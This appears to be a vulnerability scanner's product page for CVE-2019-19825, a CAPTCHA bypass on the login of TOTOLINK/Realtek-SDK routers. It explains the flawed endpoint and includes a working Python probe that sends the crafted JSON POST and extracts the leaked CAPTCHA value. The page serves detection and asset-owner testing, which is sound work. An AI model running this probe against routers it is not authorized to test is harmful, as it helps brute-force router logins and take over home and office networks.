CVE-2019-19825 Scanner - Unauthorized Admin Access vulnerability in TOTOLINK/Realtek Routers
Short Info
Level: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 15 days 16 hours
Scan only one: Domain, Subdomain, IPv4
TOTOLINK/Realtek routers are primarily used to provide Wi-Fi connectivity in small to medium-sized homes and offices. These routers are manufactured by TOTOLINK and are built on the Realtek SDK, which supplies much of their firmware, including the web management interface. They are commonly chosen for their affordability and basic networking capabilities, with different models catering to varying needs, from high-speed internet in urban settings to basic connectivity in less demanding environments. Typical users are individual consumers, small businesses, and IT enthusiasts, who rely on them for wireless internet distribution, network management, and customization of security settings.
The vulnerability detected allows an attacker to bypass the CAPTCHA protecting the login form of TOTOLINK routers based on the Realtek SDK, and so to reach restricted areas of the router's web interface. The issue arises because the login handler discloses the current CAPTCHA text to any client that asks for it, instead of only validating a submitted answer. An unauthenticated attacker can therefore retrieve the CAPTCHA value without solving it by sending a single crafted POST request. On its own this does not grant access; it removes the rate-limiting effect of the CAPTCHA, so that valid credentials can be brute-forced or, if they have been obtained elsewhere, used directly. Once authenticated, the attacker has full control of the device.
Technically, the bypass is triggered by a POST request to the boafrm/formLogin URI carrying a JSON body in which the "topicurl" field is set to "setting/getSanvas". This endpoint is meant to take part in CAPTCHA validation, but because of the flaw it returns the CAPTCHA value in its response, so the client never has to read the CAPTCHA image and the check can be satisfied mechanically. Since the request needs no session cookie or prior authentication, attackers can drive the router's login API directly rather than going through the intended web form.
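The following Python script is an added example of the check described above; it is not the scanner's own code and not code from TOTOLINK or the Realtek SDK. It builds the JSON POST to boafrm/formLogin with topicurl set to setting/getSanvas, and inspects the reply for a leaked CAPTCHA value. The page does not name the JSON key under which the device returns the CAPTCHA text, so treating any key whose name contains "captcha" as that value is an assumption, and the two sample replies embedded below are constructed for offline use rather than captured from a real device.

```python
import json
import sys
import urllib.request

# Request described on the page: a JSON POST to boafrm/formLogin with
# the topicurl field set to "setting/getSanvas".
LOGIN_PATH = "/boafrm/formLogin"
TOPICURL = "setting/getSanvas"


def build_request(host, scheme="http"):
    """Return (url, body, headers) for the CAPTCHA-retrieval probe."""
    url = f"{scheme}://{host}{LOGIN_PATH}"
    body = json.dumps({"topicurl": TOPICURL}).encode()
    headers = {"Content-Type": "application/json"}
    return url, body, headers


def extract_captcha(raw_response):
    """Parse the router's reply and return any CAPTCHA value it leaks.

    ASSUMPTION: the page does not document the exact JSON key, so any key
    whose name contains "captcha" (case-insensitive) with a non-empty
    string value is treated as the leaked CAPTCHA text. Returns None when
    the body is not a JSON object or has no such key, i.e. when the probe
    does not indicate the flaw.
    """
    try:
        data = json.loads(raw_response)
    except ValueError:  # covers JSONDecodeError and UnicodeDecodeError
        return None
    if not isinstance(data, dict):
        return None
    for key, value in data.items():
        if "captcha" in key.lower() and isinstance(value, str) and value:
            return value
    return None


def probe(host, timeout=10):
    """Send the probe to a live host and return the leaked CAPTCHA or None."""
    url, body, headers = build_request(host)
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return extract_captcha(resp.read())


# Constructed sample replies used to exercise extract_captcha offline.
# They are illustrative only, not captured from an affected router.
SAMPLE_VULNERABLE = b'{"captcha":"7K3Q","result":0}'
SAMPLE_SAFE = b'{"result":-1}'

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"usage: {sys.argv[0]} <router-ip-or-hostname>")
        sys.exit(2)
    leaked = probe(sys.argv[1])
    if leaked is None:
        print("No CAPTCHA value returned; device does not appear affected")
    else:
        print(f"CAPTCHA value returned without solving it: {leaked!r} (affected)")
```

Run it against a router you are authorized to test, e.g. `python3 probe.py 192.168.0.1`. A reply that hands back the CAPTCHA text confirms the bypass; a non-JSON or error reply does not prove the device is patched, only that this particular probe did not trigger the flaw.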
When exploited, this vulnerability can lead to significant adverse outcomes, including full administrative control over the router. Malicious actors may use this access to change network settings, monitor network traffic, or launch further attacks on connected devices. The compromised routers can be used in DDoS attacks or as a platform to distribute malware. There is also a risk of data interception from users within the network, posing privacy and security threats. Unauthorized configuration changes can degrade service performance or expose internal network segments.